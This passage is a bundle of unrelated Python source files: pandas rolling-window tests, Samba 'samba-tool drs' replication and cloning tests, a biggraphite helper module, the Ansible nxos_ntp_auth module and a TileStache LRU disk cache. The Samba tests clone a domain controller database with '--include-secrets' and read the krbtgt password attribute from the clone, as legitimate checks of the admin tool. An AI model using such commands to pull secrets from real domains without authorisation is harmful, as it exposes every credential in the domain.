['Joe', '9/9/2015', 500], ['Joe', '10/15/2015', 50]]
df = DataFrame(data=data, columns=['name', 'date', 'amount'])
df['date'] = pd.to_datetime(df['date'])
expected = df.set_index('date').groupby('name').apply(
lambda x: x.rolling('180D')['amount'].sum())
result = df.groupby('name').rolling('180D', on='date')['amount'].sum()
tm.assert_series_equal(result, expected)
def test_non_monotonic(self):
# GH 13966 (similar to #15130, closed by #15175)
dates = pd.date_range(start='2016-01-01 09:30:00',
periods=20, freq='s')
df = DataFrame({'A': [1] * 20 + [2] * 12 + [3] * 8,
'B': np.concatenate((dates, dates)),
'C': np.arange(40)})
result = df.groupby('A').rolling('4s', on='B').C.mean()
expected = df.set_index('B').groupby('A').apply(
lambda x: x.rolling('4s')['C'].mean())
tm.assert_series_equal(result, expected)
df2 = df.sort_values('B')
result = df2.groupby('A').rolling('4s', on='B').C.mean()
tm.assert_series_equal(result, expected)
def test_rolling_cov_offset(self):
# GH16058
idx = pd.date_range('2017-01-01', periods=24, freq='1h')
ss = Series(np.arange(len(idx)), index=idx)
result = ss.rolling('2h').cov()
expected = Series([np.nan] + [0.5] * (len(idx) - 1), index=idx)
tm.assert_series_equal(result, expected)
expected2 = ss.rolling(2, min_periods=1).cov()
tm.assert_series_equal(result, expected2)
result = ss.rolling('3h').cov()
expected = Series([np.nan, 0.5] + [1.0] * (len(idx) - 2), index=idx)
tm.assert_series_equal(result, expected)
expected2 = ss.rolling(3, min_periods=1).cov()
tm.assert_series_equal(result, expected2)
|
# Blackbox tests for "samba-tool drs" command
# Copyright (C) Kamen Mazdrashki <[email protected]> 2011
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Blackbox tests for samba-tool drs."""
import samba.tests
import shutil
import os
import ldb
class SambaToolDrsTests(samba.tests.BlackboxTestCase):
"""Blackbox test case for samba-tool drs."""
def setUp(self):
super(SambaToolDrsTests, self).setUp()
self.dc1 = samba.tests.env_get_var_value("DC1")
self.dc2 = samba.tests.env_get_var_value("DC2")
creds = self.get_credentials()
self.cmdline_creds = "-U%s/%s%%%s" % (creds.get_domain(),
creds.get_username(), creds.get_password())
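# For illustration (hypothetical values): with domain SAMDOM, user administrator
# and password p@ssw0rd, self.cmdline_creds becomes
# "-USAMDOM/administrator%p@ssw0rd", i.e. the -U<domain>/<user>%<password>
# form that samba-tool accepts on the command line.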
def _get_rootDSE(self, dc, ldap_only=True):
samdb = samba.tests.connect_samdb(dc, lp=self.get_loadparm(),
credentials=self.get_credentials(),
ldap_only=ldap_only)
return samdb.search(base="", scope=samba.tests.ldb.SCOPE_BASE)[0]
def test_samba_tool_bind(self):
"""Tests 'samba-tool drs bind' command."""
# Output should be like:
# Extensions supported:
# <list-of-supported-extensions>
# Site GUID: <GUID>
# Repl epoch: 0
out = self.check_output("samba-tool drs bind %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Site GUID:" in out)
self.assertTrue("Repl epoch:" in out)
def test_samba_tool_kcc(self):
"""Tests 'samba-tool drs kcc' command."""
# Output should be like 'Consistency check on <DC> successful.'
out = self.check_output("samba-tool drs kcc %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Consistency check on" in out)
self.assertTrue("successful" in out)
def test_samba_tool_showrepl(self):
"""Tests 'samba-tool drs showrepl' command.
"""
# Output should be like:
# <site-name>/<domain-name>
# DSA Options: <hex-options>
# DSA object GUID: <DSA-object-GUID>
# DSA invocationId: <DSA-invocationId>
# <Inbound-connections-list>
# <Outbound-connections-list>
# <KCC-objects>
# ...
# TODO: Perhaps we should check at least for
# DSA's objectGUID and invocationId
out = self.check_output("samba-tool drs showrepl %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("DSA Options:" in out)
self.assertTrue("DSA object GUID:" in out)
self.assertTrue("DSA invocationId:" in out)
def test_samba_tool_options(self):
"""Tests 'samba-tool drs options' command
"""
# Output should be like 'Current DSA options: IS_GC <OTHER_FLAGS>'
out = self.check_output("samba-tool drs options %s %s" % (self.dc1,
self.cmdline_creds))
self.assertTrue("Current DSA options:" in out)
def test_samba_tool_replicate(self):
"""Tests 'samba-tool drs replicate' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_async(self):
"""Tests 'samba-tool drs replicate --async-op' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was started.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --async-op %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was started" in out)
def test_samba_tool_replicate_local_online(self):
"""Tests 'samba-tool drs replicate --local-online' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local-online %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_local_online_async(self):
"""Tests 'samba-tool drs replicate --local-online --async-op' command."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was started.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local-online --async-op %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was started" in out)
def test_samba_tool_replicate_local_machine_creds(self):
"""Tests 'samba-tool drs replicate --local -P' command (uses machine creds)."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate -P --local %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_local(self):
"""Tests 'samba-tool drs replicate --local' command (uses machine creds)."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate --local %s %s %s %s" % (self.dc1,
self.dc2,
nc_name,
self.cmdline_creds))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_machine_creds_P(self):
"""Tests 'samba-tool drs replicate -P' command with machine creds."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate -P %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_replicate_machine_creds(self):
"""Tests 'samba-tool drs replicate' command with implicit machine creds."""
# Output should be like 'Replicate from <DC-SRC> to <DC-DEST> was successful.'
nc_name = self._get_rootDSE(self.dc1)["defaultNamingContext"]
out = self.check_output("samba-tool drs replicate %s %s %s" % (self.dc1,
self.dc2,
nc_name))
self.assertTrue("Replicate from" in out)
self.assertTrue("was successful" in out)
def test_samba_tool_drs_clone_dc(self):
"""Tests 'samba-tool drs clone-dc-database' command."""
server_rootdse = self._get_rootDSE(self.dc1)
server_nc_name = server_rootdse["defaultNamingContext"]
server_ds_name = server_rootdse["dsServiceName"]
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s --targetdir=%s"
% (server_realm,
self.dc1,
self.cmdline_creds,
self.tempdir))
ldb_rootdse = self._get_rootDSE("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"), ldap_only=False)
nc_name = ldb_rootdse["defaultNamingContext"]
ds_name = ldb_rootdse["dsServiceName"]
ldap_service_name = str(ldb_rootdse["ldapServiceName"][0])
self.assertEqual(nc_name, server_nc_name)
# The clone should pretend to be the source server
self.assertEqual(ds_name, server_ds_name)
self.assertEqual(ldap_service_name, server_ldap_service_name)
samdb = samba.tests.connect_samdb("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"),
ldap_only=False, lp=self.get_loadparm())
def get_krbtgt_pw():
krbtgt_pw = samdb.searchone("unicodePwd", "cn=krbtgt,CN=users,%s" % nc_name)
self.assertRaises(KeyError, get_krbtgt_pw)
server_dn = samdb.searchone("serverReferenceBL", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
ntds_guid = samdb.searchone("objectGUID", "cn=ntds settings,%s" % server_dn)
res = samdb.search(base=str(server_nc_name),
expression="(&(objectclass=user)(cn=dns-%s))" % (self.dc2),
attrs=[], scope=ldb.SCOPE_SUBTREE)
if len(res) == 1:
dns_obj = res[0]
else:
dns_obj = None
# While we have this cloned, try demoting the other server on the clone, by GUID
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (ntds_guid,
self.tempdir))
# Check some of the objects that should have been removed
def check_machine_obj():
samdb.searchone("CN", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
self.assertRaises(ldb.LdbError, check_machine_obj)
def check_server_obj():
samdb.searchone("CN", server_dn)
self.assertRaises(ldb.LdbError, check_server_obj)
def check_ntds_guid():
samdb.searchone("CN", "<GUID=%s>" % ntds_guid)
self.assertRaises(ldb.LdbError, check_ntds_guid)
if dns_obj is not None:
# Check some of the objects that should have been removed
def check_dns_account_obj():
samdb.search(base=dns_obj.dn, scope=ldb.SCOPE_BASE,
attrs=[])
self.assertRaises(ldb.LdbError, check_dns_account_obj)
shutil.rmtree(os.path.join(self.tempdir, "private"))
shutil.rmtree(os.path.join(self.tempdir, "etc"))
shutil.rmtree(os.path.join(self.tempdir, "msg.lock"))
os.remove(os.path.join(self.tempdir, "names.tdb"))
shutil.rmtree(os.path.join(self.tempdir, "state"))
def test_samba_tool_drs_clone_dc_secrets(self):
"""Tests 'samba-tool drs clone-dc-database --include-secrets' command ."""
server_rootdse = self._get_rootDSE(self.dc1)
server_nc_name = server_rootdse["defaultNamingContext"]
server_ds_name = server_rootdse["dsServiceName"]
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s --targetdir=%s --include-secrets"
% (server_realm,
self.dc1,
self.cmdline_creds,
self.tempdir))
ldb_rootdse = self._get_rootDSE("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"), ldap_only=False)
nc_name = ldb_rootdse["defaultNamingContext"]
config_nc_name = ldb_rootdse["configurationNamingContext"]
ds_name = ldb_rootdse["dsServiceName"]
ldap_service_name = str(ldb_rootdse["ldapServiceName"][0])
samdb = samba.tests.connect_samdb("tdb://" + os.path.join(self.tempdir, "private", "sam.ldb"),
ldap_only=False, lp=self.get_loadparm())
krbtgt_pw = samdb.searchone("unicodePwd", "cn=krbtgt,CN=users,%s" % nc_name)
self.assertIsNotNone(krbtgt_pw)
self.assertEqual(nc_name, server_nc_name)
# The clone should pretend to be the source server
self.assertEqual(ds_name, server_ds_name)
self.assertEqual(ldap_service_name, server_ldap_service_name)
server_dn = samdb.searchone("serverReferenceBL", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
ntds_guid = samdb.searchone("objectGUID", "cn=ntds settings,%s" % server_dn)
res = samdb.search(base=str(server_nc_name),
expression="(&(objectclass=user)(cn=dns-%s))" % (self.dc2),
attrs=[], scope=ldb.SCOPE_SUBTREE)
if len(res) == 1:
dns_obj = res[0]
else:
dns_obj = None
def demote_self():
# While we have this cloned, try demoting the other server on the clone
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (self.dc1,
self.tempdir))
self.assertRaises(samba.tests.BlackboxProcessError, demote_self)
# While we have this cloned, try demoting the other server on the clone
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (self.dc2,
self.tempdir))
# Check some of the objects that should have been removed
def check_machine_obj():
samdb.searchone("CN", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
self.assertRaises(ldb.LdbError, check_machine_obj)
def check_server_obj():
samdb.searchone("CN", server_dn)
self.assertRaises(ldb.LdbError, check_server_obj)
def check_ntds_guid():
samdb.searchone("CN", "<GUID=%s>" % ntds_guid)
self.assertRaises(ldb.LdbError, check_ntds_guid)
if dns_obj is not None:
# Check some of the objects that should have been removed
def check_dns_account_obj():
samdb.search(base=dns_obj.dn, scope=ldb.SCOPE_BASE,
attrs=[])
self.assertRaises(ldb.LdbError, check_dns_account_obj)
shutil.rmtree(os.path.join(self.tempdir, "private"))
shutil.rmtree(os.path.join(self.tempdir, "etc"))
shutil.rmtree(os.path.join(self.tempdir, "msg.lock"))
os.remove(os.path.join(self.tempdir, "names.tdb"))
shutil.rmtree(os.path.join(self.tempdir, "state"))
def test_samba_tool_drs_clone_dc_secrets_without_targetdir(self):
"""Tests 'samba-tool drs clone-dc-database' command without --targetdir."""
server_rootdse = self._get_rootDSE(self.dc1)
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
def attempt_clone():
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s"
% (server_realm,
self.dc1,
self.cmdline_creds))
self.assertRaises(samba.tests.BlackboxProcessError, attempt_clone)
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions currently used by the Cassandra driver but not specific to it."""
from __future__ import absolute_import
from __future__ import print_function
import threading
from biggraphite import accessor as bg_accessor
class Error(bg_accessor.Error):
"""Base class for all exceptions from this module."""
class CountDown(object):
"""Decrements a count, calls a callback when it reaches 0.
This is used to wait for queries to complete without storing & sorting their results.
"""
__slots__ = ("_canceled", "count", "_lock", "_on_zero")
def __init__(self, count, on_zero):
"""Record parameters.
Args:
count: The integer that will be decremented, must be > 0
on_zero: called once count reaches zero, see decrement
"""
assert count > 0
self.count = count
self._canceled = False
self._lock = threading.Lock()
self._on_zero = on_zero
def cancel(self, reason):
"""Call the callback now with reason as argument."""
with self._lock:
if self._canceled:
return
self._canceled = True
self._on_zero(reason)
def decrement(self):
"""Call the callback if count reached zero, with None as argument."""
with self._lock:
self.count -= 1
if self._canceled:
return
elif not self.count:
self._on_zero(None)
def on_result(self, unused_result):
"""Call decrement(), suitable for Cassandra's execute_async."""
self.decrement()
def on_failure(self, exc):
"""Call cancel(), suitable for Cassandra's execute_async."""
self.cancel(Error(exc))
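# A minimal usage sketch (not part of the driver): share one CountDown between
# the callbacks of three asynchronous operations and block until all of them
# have completed. The names below (done, _on_zero) are illustrative only;
# threading.Event stands in for whatever signalling mechanism the caller uses.
#
#     import threading
#
#     done = threading.Event()
#
#     def _on_zero(error):
#         # error is None on success, or the Error passed to cancel()/on_failure()
#         done.set()
#
#     countdown = CountDown(count=3, on_zero=_on_zero)
#     for _ in range(3):
#         countdown.decrement()  # e.g. wired to execute_async via on_result
#     done.wait()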
def list_from_str(value):
"""Convert a comma separated string into a list.
Args:
value: str or list or set.
Returns:
list: a list of values.
"""
if type(value) is str and value:
value = [s.strip() for s in value.split(",")]
elif type(value) in (list, set) and value:
value = list(value)
elif value is None:
value = []
elif not value:
value = []
else:
raise Error("Unkown type for '%s'" % (value))
return value
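# Illustrative behaviour (a sketch, not called anywhere in this module): a comma
# separated string is split and stripped, containers are normalised to lists and
# empty or None inputs yield an empty list.
#
#     list_from_str("a, b,c")   -> ["a", "b", "c"]
#     list_from_str(["a", "b"]) -> ["a", "b"]
#     list_from_str(None)       -> []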
def bool_from_str(value):
"""Convert a user-specified string to a bool."""
if value == "True":
return True
elif value == "False":
return False
elif type(value) is bool:
return value
return str(value)
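# Expected conversions (sketch): the strings "True"/"False" map to the matching
# booleans, real booleans pass through unchanged, and anything else is returned
# as its string representation.
#
#     bool_from_str("True") -> True
#     bool_from_str(False)  -> False
#     bool_from_str(3)      -> "3"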
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_ntp_auth
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages NTP authentication.
description:
- Manages NTP authentication.
author:
- Jason Edelman (@jedelman8)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- If C(state=absent), the module will remove the given key configuration if it exists.
- If C(state=absent) and C(authentication=on), authentication will be turned off.
options:
key_id:
description:
- Authentication key identifier (numeric).
md5string:
description:
- MD5 String.
auth_type:
description:
- Whether the given md5string is in cleartext or
has been encrypted. If in cleartext, the device
will encrypt it before storing it.
default: text
choices: ['text', 'encrypt']
trusted_key:
description:
- Whether the given key is required to be supplied by a time source
for the device to synchronize to the time source.
choices: [ 'false', 'true' ]
default: 'false'
authentication:
description:
- Turns NTP authentication on or off.
choices: ['on', 'off']
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# Basic NTP authentication configuration
- nxos_ntp_auth:
key_id: 32
md5string: hello
auth_type: text
'''
RETURN = '''
commands:
description: command sent to the device
returned: always
type: list
sample: ["ntp authentication-key 32 md5 helloWorld 0", "ntp trusted-key 32"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
if 'show run' not in command:
command = {
'command': command,
'output': 'json',
}
else:
command = {
'command': command,
'output': 'text',
}
return run_commands(module, [command])
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_ntp_auth(module):
command = 'show ntp authentication-status'
body = execute_show_command(command, module)[0]
ntp_auth_str = body['authentication']
if 'enabled' in ntp_auth_str:
ntp_auth = True
else:
ntp_auth = False
return ntp_auth
def get_ntp_trusted_key(module):
trusted_key_list = []
command = 'show run | inc ntp.trusted-key'
trusted_key_str = execute_show_command(command, module)[0]
if trusted_key_str:
trusted_keys = trusted_key_str.splitlines()
else:
trusted_keys = []
for line in trusted_keys:
if line:
trusted_key_list.append(str(line.split()[2]))
return trusted_key_list
def get_ntp_auth_key(key_id, module):
authentication_key = {}
command = 'show run | inc ntp.authentication-key.{0}'.format(key_id)
auth_regex = (r".*ntp\sauthentication-key\s(?P<key_id>\d+)\s"
r"md5\s(?P<md5string>\S+)\s(?P<atype>\S+).*")
body = execute_show_command(command, module)[0]
try:
match_authentication = re.match(auth_regex, body, re.DOTALL)
group_authentication = match_authentication.groupdict()
authentication_key['key_id'] = group_authentication['key_id']
authentication_key['md5string'] = group_authentication['md5string']
if group_authentication['atype'] == '7':
authentication_key['auth_type'] = 'encrypt'
else:
authentication_key['auth_type'] = 'text'
except (AttributeError, TypeError):
authentication_key = {}
return authentication_key
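# For illustration, using the sample from RETURN above: a running-config line
# such as
#     ntp authentication-key 32 md5 helloWorld 0
# matches auth_regex and produces
#     {'key_id': '32', 'md5string': 'helloWorld', 'auth_type': 'text'}
# whereas a trailing '7' instead of '0' would be reported as auth_type 'encrypt'.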
def get_ntp_auth_info(key_id, module):
auth_info = get_ntp_auth_key(key_id, module)
trusted_key_list = get_ntp_trusted_key(module)
auth_power = get_ntp_auth(module)
if key_id in trusted_key_list:
auth_info['trusted_key'] = 'true'
else:
auth_info['trusted_key'] = 'false'
if auth_power:
auth_info['authentication'] = 'on'
else:
auth_info['authentication'] = 'off'
return auth_info
def auth_type_to_num(auth_type):
if auth_type == 'encrypt':
return '7'
else:
return '0'
def set_ntp_auth_key(key_id, md5string, auth_type, trusted_key, authentication):
ntp_auth_cmds = []
if key_id and md5string:
auth_type_num = auth_type_to_num(auth_type)
ntp_auth_cmds.append(
'ntp authentication-key {0} md5 {1} {2}'.format(
key_id, md5string, auth_type_num))
if trusted_key == 'true':
ntp_auth_cmds.append(
'ntp trusted-key {0}'.format(key_id))
elif trusted_key == 'false':
ntp_auth_cmds.append(
'no ntp trusted-key {0}'.format(key_id))
if authentication == 'on':
ntp_auth_cmds.append(
'ntp authenticate')
elif authentication == 'off':
ntp_auth_cmds.append(
'no ntp authenticate')
return ntp_auth_cmds
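# A sketch of what this helper emits for the module's EXAMPLES task (key_id=32,
# md5string='hello', auth_type='text', trusted_key='false', authentication not
# set):
#     ['ntp authentication-key 32 md5 hello 0', 'no ntp trusted-key 32']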
def remove_ntp_auth_key(key_id, md5string, auth_type, trusted_key, authentication):
auth_remove_cmds = []
if key_id:
auth_type_num = auth_type_to_num(auth_type)
auth_remove_cmds.append(
'no ntp authentication-key {0} md5 {1} {2}'.format(
key_id, md5string, auth_type_num))
if authentication:
auth_remove_cmds.append(
'no ntp authenticate')
return auth_remove_cmds
def main():
argument_spec = dict(
key_id=dict(type='str'),
md5string=dict(type='str'),
auth_type=dict(choices=['text', 'encrypt'], default='text'),
trusted_key=dict(choices=['true', 'false'], default='false'),
authentication=dict(choices=['on', 'off']),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
key_id = module.params['key_id']
md5string = module.params['md5string']
auth_type = module.params['auth_type']
trusted_key = module.params['trusted_key']
authentication = module.params['authentication']
state = module.params['state']
if key_id:
if not trusted_key and not md5string:
module.fail_json(msg='trusted_key or md5string MUST be specified')
args = dict(key_id=key_id, md5string=md5string,
auth_type=auth_type, trusted_key=trusted_key,
authentication=authentication)
changed = False
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_ntp_auth_info(key_id, module)
end_state = existing
delta = dict(set(proposed.items()).difference(existing.items()))
commands = []
if state == 'present':
if delta:
command = set_ntp_auth_key(
key_id, md5string, delta.get('auth_type'),
delta.get('trusted_key'), delta.get('authentication'))
if command:
commands.append(command)
elif state == 'absent':
auth_toggle = None
if existing.get('authentication') == 'on':
auth_toggle = True
if not existing.get('key_id'):
key_id = None
command = remove_ntp_auth_key(
key_id, md5string, auth_type, trusted_key, auth_toggle)
if command:
commands.append(command)
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
load_config(module, cmds)
end_state = get_ntp_auth_info(key_id, module)
delta = dict(set(end_state.items()).difference(existing.items()))
if delta or (len(existing) != len(end_state)):
changed = True
if 'configure' in cmds:
cmds.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['updates'] = cmds
results['changed'] = changed
results['warnings'] = warnings
results['end_state'] = end_state
module.exit_json(**results)
if __name__ == '__main__':
main()
|
""" Cache that stores a limited amount of data.
This is an example cache that uses a SQLite database to track sizes and last-read
times for cached tiles, and removes least-recently-used tiles whenever the total
size of the cache exceeds a set limit.
Example TileStache cache configuration, with a 16MB limit:
"cache":
{
"class": "TileStache.Goodies.Caches.LimitedDisk.Cache",
"kwargs": {
"path": "/tmp/limited-cache",
"limit": 16777216
}
}
"""
import os
import sys
import time
from math import ceil as _ceil
from tempfile import mkstemp
from os.path import isdir, exists, dirname, basename, join as pathjoin
from sqlite3 import connect, OperationalError, IntegrityError
_create_tables = """
CREATE TABLE IF NOT EXISTS locks (
row INTEGER,
column INTEGER,
zoom INTEGER,
format TEXT,
PRIMARY KEY (row, column, zoom, format)
)
""", """
CREATE TABLE IF NOT EXISTS tiles (
path TEXT PRIMARY KEY,
used INTEGER,
size INTEGER
)
""", """
CREATE INDEX IF NOT EXISTS tiles_used ON tiles (used)
"""
class Cache:
def __init__(self, path, limit, umask=0022):
self.cachepath = path
self.dbpath = pathjoin(self.cachepath, 'stache.db')
self.umask = umask
self.limit = limit
db = connect(self.dbpath).cursor()
for create_table in _create_tables:
db.execute(create_table)
db.connection.close()
def _filepath(self, layer, coord, format):
"""
"""
l = layer.name()
z = '%d' % coord.zoom
e = format.lower()
x = '%06d' % coord.column
y = '%06d' % coord.row
x1, x2 = x[:3], x[3:]
y1, y2 = y[:3], y[3:]
filepath = os.sep.join( (l, z, x1, x2, y1, y2 + '.' + e) )
return filepath
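# For illustration (hypothetical layer and coordinate): a layer named "osm" at
# zoom 12, column 656, row 1582 in PNG format is stored under
#     osm/12/000/656/001/582.png
# i.e. column and row are zero-padded to six digits and split 3+3 into nested
# directories to keep any single directory small.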
def lock(self, layer, coord, format):
""" Acquire a cache lock for this tile.
Returns nothing, but (TODO) blocks until the lock has been acquired.
Lock is implemented as a row in the "locks" table.
"""
sys.stderr.write('lock %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
due = time.time() + layer.stale_lock_timeout
while True:
if time.time() > due:
# someone left the door locked.
sys.stderr.write('...force %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
self.unlock(layer, coord, format)
# try to acquire a lock, repeating if necessary.
db = connect(self.dbpath, isolation_level='EXCLUSIVE').cursor()
try:
db.execute("""INSERT INTO locks
(row, column, zoom, format)
VALUES (?, ?, ?, ?)""",
(coord.row, coord.column, coord.zoom, format))
except IntegrityError:
db.connection.close()
time.sleep(.2)
continue
else:
db.connection.commit()
db.connection.close()
break
def unlock(self, layer, coord, format):
""" Release a cache lock for this tile.
Lock is implemented as a row in the "locks" table.
"""
sys.stderr.write('unlock %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
db = connect(self.dbpath, isolation_level='EXCLUSIVE').cursor()
db.execute("""DELETE FROM locks
WHERE row=? AND column=? AND zoom=? AND format=?""",
(coord.row, coord.column, coord.zoom, format))
db.connection.commit()
db.connection.close()
def remove(self, layer, coord, format):
""" Remove a cached tile.
"""
# TODO: write me
raise NotImplementedError('LimitedDisk Cache does not yet implement the .remove() method.')
def read(self, layer, coord, format):
""" Read a cached tile.
If found, update the used column in the tiles table with current time.
"""
sys.stderr.write('read %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
path = self._filepath(layer, coord, format)
fullpath = pathjoin(self.cachepath, path)
if exists(fullpath):
body = open(fullpath, 'r').read()
sys.stderr.write('...hit %s, set used=%d' % (path, time.time()))
db = connect(self.dbpath).cursor()
db.execute("""UPDATE tiles
SET used=?
WHERE path=?""",
(int(time.time()), path))
db.connection.commit()
db.connection.close()
else:
sys.stderr.write('...miss')
body = None
return body
def _write(self, body, path, format):
""" Actually write the file to the cache directory, return its size.
If filesystem block size is known, try to return actual disk space used.
"""
fullpath = pathjoin(self.cachepath, path)
try:
umask_old = os.umask(self.umask)
os.makedirs(dirname(fullpath), 0777&~self.umask)
except OSError, e:
if e.errno != 17:
raise
finally:
os.umask(umask_old)
fh, tmp_path = mkstemp(dir=self.cachepath, suffix='.' + format.lower())
os.write(fh, body)
os.close(fh)
try:
os.rename(tmp_path, fullpath)
except OSError:
os.unlink(fullpath)
os.rename(tmp_path, fullpath)
os.chmod(fullpath, 0666&~self.umask)
stat = os.stat(fullpath)
size = stat.st_size
if hasattr(stat, 'st_blksize'):
blocks = _ceil(size / float(stat.st_blksize))
size = int(blocks * stat.st_blksize)
return size
def _remove(self, path):
"""
"""
fullpath = pathjoin(self.cachepath, path)
os.unlink(fullpath)
def save(self, body, layer, coord, format):
"""
"""
sys.stderr.write('save %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
path = self._filepath(layer, coord, format)
size = self._write(body, path, format)
db = connect(self.dbpath).cursor()
try:
db.execute("""INSERT INTO tiles
(size, used, path)
VALUES (?, ?, ?)""",
(size, int(time.time()), path))
except IntegrityError:
db.execute("""UPDATE tiles
SET size=?, used=?
WHERE path=?""",
(size, int(time.time()), path))
row = db.execute('SELECT SUM(size) FROM tiles').fetchone()
if row and (row[0] > self.limit):
over = row[0] - self.limit
while over > 0:
row = db.execute('SELECT path, size FROM tiles ORDER BY used ASC LIMIT 1').fetchone()
if row is None:
break
path, size = row
db.execute('DELETE FROM tiles WHERE path=?', (path, ))
self._remove(path)
over -= size
sys.stderr.write('delete ' + path)
db.connection.commit()
db.connection.close()
|
# Local imports
from .serialize import *
from .service import Service
class TransverseException(Exception):
""" An Exception that can be marshalled as a response to a remote call.
Base class for exceptions that should be sent for handling on the other
side of the route rather than being handled on the side that raised
them. When an ExposedCallable completes by raising a
TransverseException, then this will be marshalled and sent as the
message response.
"""
def remoteClone(self):
